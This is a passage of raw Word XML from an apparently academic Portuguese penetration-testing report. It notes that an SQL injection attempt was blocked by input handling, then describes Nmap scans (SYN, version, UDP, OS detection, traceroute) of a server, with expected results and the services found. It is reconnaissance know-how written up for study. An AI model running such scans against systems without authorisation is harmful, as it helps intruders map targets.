          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> esperado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="004E2307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tratamento de todos os caracteres informados como parâmetros regulares da consulta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765ACB" w:rsidRDefault="005967D5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Pr="00F15F82" w:rsidRDefault="00D76012" w:rsidP="00765AC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A aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F31428" w:rsidRDefault="00F31428" w:rsidP="00AC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Default="00F3154F" w:rsidP="00AC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Default="00F3154F" w:rsidP="00AC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Default="00F3154F" w:rsidP="00AC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54F" w:rsidRPr="00F15F82" w:rsidRDefault="00F3154F" w:rsidP="00AC10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F31428" w:rsidRPr="00F3154F" w:rsidRDefault="008C6DC7" w:rsidP="00630433">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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3154F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Iteração </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F3154F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F3154F" w:rsidRPr="00F3154F" w:rsidRDefault="00F3154F" w:rsidP="00F3154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F31428" w:rsidP="00F315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.3.2.1</w:t>
      </w:r>
      <w:r w:rsidR="00A83EB9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966EC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Atividade: a</w:t>
      </w:r>
      <w:r w:rsidR="008C2F72" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nálise do s</w:t>
      </w:r>
      <w:r w:rsidR="00A83EB9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ervidor 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ia </w:t>
      </w:r>
      <w:proofErr w:type="spell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Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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no dia 09/04/16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="005A089C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F31428">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, abordada no subcapítulo 3.2,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para descobrir portas abertas no servidor e que </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>atividade</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> maliciosa</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> pode</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ser desenvolvida</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a partir diss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left="1415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Ss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F15F82" w:rsidRDefault="00CE03DD" w:rsidP="0063043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” executa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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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s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” permite que a ferramenta tente fazer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SYN do TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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E2307" w:rsidRPr="00F15F82" w:rsidRDefault="004E2307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4777A" w:rsidRPr="00F15F82" w:rsidRDefault="0084777A" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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spera-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas abertas, e 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>os serviço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que estão rodando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 xml:space="preserve"> nessas porta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no momento do escaneament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1428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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7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rro na ferramenta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F31428" w:rsidRDefault="00F31428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31428" w:rsidRPr="00F15F82" w:rsidRDefault="00F31428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Utilização do comand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sS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F15F82" w:rsidRDefault="00CE03DD" w:rsidP="0063043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“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” executa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S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” permite que a ferramenta tente fazer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SYN do TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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197C78" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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197C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/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97C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00197C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78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spera-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas abertas, e os serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00197C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78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D3D74" w:rsidRPr="00F15F82" w:rsidRDefault="00F31428" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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8C2F72" w:rsidRPr="00F15F82" w:rsidRDefault="008C2F72" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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De acordo com a figura 4,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s portas abertas, e </w:t>
      </w:r>
      <w:r w:rsidR="00197C78" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>serviços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que estavam rodando</w:t>
      </w:r>
      <w:r w:rsidR="00197C78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nessas portas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no momento do escaneament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54DEF" w:rsidRPr="00F15F82" w:rsidRDefault="00654DEF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11355087" wp14:editId="455EFDEB">
            <wp:extent cx="4957296" cy="3505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13" cy="35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Figura 4 - Portas encontradas e os serviços que estavam rodando nelas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001923D7" w:rsidRPr="00F15F82" w:rsidRDefault="001923D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23D7" w:rsidRPr="00F15F82" w:rsidRDefault="001923D7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Serviços </w:t>
      </w:r>
      <w:r w:rsidR="008C2F72" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e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>ncontrados na figura 4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1923D7" w:rsidRPr="00F15F82" w:rsidRDefault="00E513AC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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows RPC </w:t>
      </w:r>
      <w:r w:rsidR="001923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- Ferramenta semelhante ao </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001923D7" w:rsidRPr="00F15F82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="001923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> que conecta </w:t>
      </w:r>
      <w:r w:rsidR="002A5CE5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="001923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> computador criando um esquema de servidor - cliente; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001923D7" w:rsidRPr="00F15F82" w:rsidRDefault="00E513AC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8C2F72" w:rsidRPr="00F15F82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1923D7" w:rsidRPr="00F15F82" w:rsidRDefault="00E513AC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– Servidor</w:t>
      </w:r>
      <w:r w:rsidR="008C2F72" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001923D7" w:rsidRPr="00F15F82" w:rsidRDefault="00E513AC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1923D7" w:rsidRPr="00F15F82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8C2F72" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r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8C2F72" w:rsidRPr="00F15F82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1923D7" w:rsidRPr="00F15F82" w:rsidRDefault="00E513AC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751591" w:rsidRDefault="001923D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E513AC" w:rsidRPr="00F15F82" w:rsidRDefault="00E513AC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Utilização do comando:</w:t>
      </w:r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spellStart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 -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03DD" w:rsidRPr="00F15F82" w:rsidRDefault="00CE03DD" w:rsidP="0063043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” executa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” permite que a ferramenta realize o SYN e busque a versão do </w:t>
      </w:r>
      <w:r w:rsidR="002A5CE5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>software rodan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no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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7C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00197C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78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lastRenderedPageBreak/>
        <w:t>Espera-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas abertas, os serviços e as versões dos softwares que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00197C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78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</w:p>
    <w:p w:rsidR="00E92559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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78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De acordo com a figura 5,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s portas abertas, os serviços e a versão dos softwares que estavam rodando nessas portas no momento do escaneament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624EB" w:rsidRPr="00F15F82" w:rsidRDefault="00C624E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8400705" wp14:editId="7B5A452C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igura 5 - Portas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e versões dos sistemas que elas estavam rodand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751591" w:rsidP="00F3154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Serviços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2A5CE5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e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>5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C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00E92559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b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows RPC </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- Ferramenta semelhante ao </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> que conecta </w:t>
      </w:r>
      <w:r w:rsidR="002A5CE5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> computador criando um esquema de servidor - cliente; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00E92559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1923D7" w:rsidRPr="00F15F82" w:rsidRDefault="00E92559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197C78" w:rsidRPr="00F15F82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1923D7" w:rsidRPr="00F15F82" w:rsidRDefault="00E92559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1923D7" w:rsidRPr="00F15F82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6853AA" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="001923D7" w:rsidRPr="00F15F82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197C78" w:rsidRPr="00F15F82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1923D7" w:rsidRPr="00F15F82" w:rsidRDefault="00E92559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923D7"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="001923D7" w:rsidRPr="00F15F82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="001923D7" w:rsidRPr="00F15F82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8A79EE" w:rsidRPr="00F15F82" w:rsidRDefault="008A79EE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Utilização do comando</w:t>
      </w:r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spellStart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5DFB" w:rsidRPr="00F15F82" w:rsidRDefault="001A5DFB" w:rsidP="006304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” executa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” permite que a ferramenta utilize o detector de portas UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="006304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C0198A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95ED3" w:rsidRPr="00F15F82" w:rsidRDefault="00E95ED3" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E95ED3" w:rsidRPr="00F15F82" w:rsidRDefault="00E95ED3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Espera-se descobrir o sistema operacional utilizado pelo servidor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xplorado</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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, as portas UDP abertas e os serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E95ED3" w:rsidRPr="00F15F82" w:rsidRDefault="00E95ED3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</w:p>
    <w:p w:rsidR="00E92559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E95ED3" w:rsidRPr="00F15F82" w:rsidRDefault="00640C50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De acordo com a figura 6</w:t>
      </w:r>
      <w:r w:rsidR="00E95ED3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, </w:t>
      </w:r>
      <w:r w:rsidR="00E95ED3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="00E95ED3"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="00E95ED3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E95ED3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="00E95ED3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s portas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UDP abertas e</w:t>
      </w:r>
      <w:r w:rsidR="00E95ED3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os serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A5DFB" w:rsidRPr="00F15F82" w:rsidRDefault="001A5DF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5DFB" w:rsidRPr="00F15F82" w:rsidRDefault="001A5DF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.</w:t>
      </w:r>
      <w:r w:rsidR="00C624EB"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511C9A93" wp14:editId="5162E154">
            <wp:extent cx="5667375" cy="379349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igura 6 - Portas UDP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e serviços que estavam rodando nelas no momento do escaneamento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F4807" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7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Serviços</w:t>
      </w:r>
      <w:r w:rsidR="00B25D43" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r w:rsidR="003F4807" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ncontrados na </w:t>
      </w:r>
      <w:r w:rsidR="00B25D43" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>figura 6:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7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:rsidR="008C6DC7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8C6DC7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F5692A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - protocolo utilizado pelo sistema operacional W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indows para compartilhamento e impressões de arquivos; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F5692A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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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L2TP</w:t>
      </w:r>
      <w:r w:rsidR="005135D8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5135D8"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(Protocolo de Encapsulamento de C</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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 xml:space="preserve">amada </w:t>
      </w:r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2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005135D8"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)</w:t>
      </w:r>
      <w:r w:rsidR="00915C31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[11] </w:t>
      </w:r>
      <w:r w:rsidR="005135D8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>– Protocolo de encapsulamento da Internet</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7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, </w:t>
      </w:r>
      <w:r w:rsidR="005135D8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utilizado por uma conexão de </w:t>
      </w:r>
      <w:r w:rsidR="00F5692A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>VPN</w:t>
      </w:r>
      <w:r w:rsidR="005135D8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(rede virtual privada) para acessar uma rede privada</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="006515FB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35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F5692A" w:rsidP="0063043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694" w:hanging="21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proofErr w:type="gramStart"/>
      <w:r w:rsidR="003F4807" w:rsidRPr="00F15F82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="003F4807" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [3] - protocolo de sincr</w:t>
      </w:r>
      <w:r w:rsidR="006515FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>onização de relógios usando UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC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Default="00A83EB9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Varredura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5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00F3154F" w:rsidRPr="00F15F82" w:rsidRDefault="00F3154F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A -O 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A5DFB" w:rsidRPr="00F15F82" w:rsidRDefault="001A5DFB" w:rsidP="0063043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” executa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A” é para usar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requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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B7BA9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5686A" w:rsidRPr="00F15F82" w:rsidRDefault="0005686A" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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5686A" w:rsidRPr="00F15F82" w:rsidRDefault="0005686A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spera-se descobrir o sistema operacional utilizado pelo servidor explorado e traçar a rota da requisição ao servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0005686A" w:rsidRPr="00F15F82" w:rsidRDefault="0005686A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515FB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05686A" w:rsidRPr="00F15F82" w:rsidRDefault="0005686A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De acordo com a</w:t>
      </w:r>
      <w:r w:rsidR="00185ED4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s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 figura</w:t>
      </w:r>
      <w:r w:rsidR="00185ED4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s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 </w:t>
      </w:r>
      <w:r w:rsidR="005E239F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7</w:t>
      </w:r>
      <w:r w:rsidR="00185ED4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 e 8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,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5E239F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>a rota traçada para a requisição ao servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A79EE" w:rsidRPr="00F15F82" w:rsidRDefault="008A79EE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A79EE" w:rsidRPr="00F15F82" w:rsidRDefault="00C624E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1270</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="3739515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21457"/>
                <wp:lineTo x="21488" y="21457"/>
                <wp:lineTo x="21488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igura 7 - Rota traçada pel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Parte 1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30877" w:rsidRPr="00F15F82" w:rsidRDefault="00BF5785" w:rsidP="00F3154F">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1415" w:firstLine="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Serviços e</w:t>
      </w:r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Pr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r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30877" w:rsidRPr="00F15F82" w:rsidRDefault="00530877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b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>Microsoft Windows RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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Pr="00F15F82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F15F82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:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="00530877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Pr="00F15F82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F15F82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</w:t>
      </w:r>
      <w:r w:rsidR="00BF5785" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> uma distribuição Windows;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="00530877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Pr="00F15F82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BF5785" w:rsidRPr="00F15F82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530877" w:rsidRPr="00F15F82" w:rsidRDefault="00530877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Pr="00F15F82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185ED4" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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BF5785" w:rsidRPr="00F15F82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530877" w:rsidRPr="00F15F82" w:rsidRDefault="00530877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Pr="00F15F82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30877" w:rsidRPr="00F15F82" w:rsidRDefault="0053087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30877" w:rsidRPr="00F15F82" w:rsidRDefault="0053087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C624E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1248B1EF" wp14:editId="09DEDFB1">
            <wp:extent cx="5400040" cy="375856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igura 8 - Rota traçada pel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Tracerout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Parte 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7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79D1" w:rsidRDefault="005F79D1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79D1" w:rsidRPr="00F15F82" w:rsidRDefault="005F79D1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6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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-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31A3E" w:rsidRPr="00F15F82" w:rsidRDefault="00831A3E" w:rsidP="0063043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” executa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” permite que a ferramenta realize o SYN</w:t>
      </w:r>
      <w:r w:rsidR="003D23F9" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e busque a versão do software </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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p” indica quais portas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devem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ser usadas no teste, o delimitador é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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</w:t>
      </w:r>
      <w:r w:rsidR="00B3361B" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
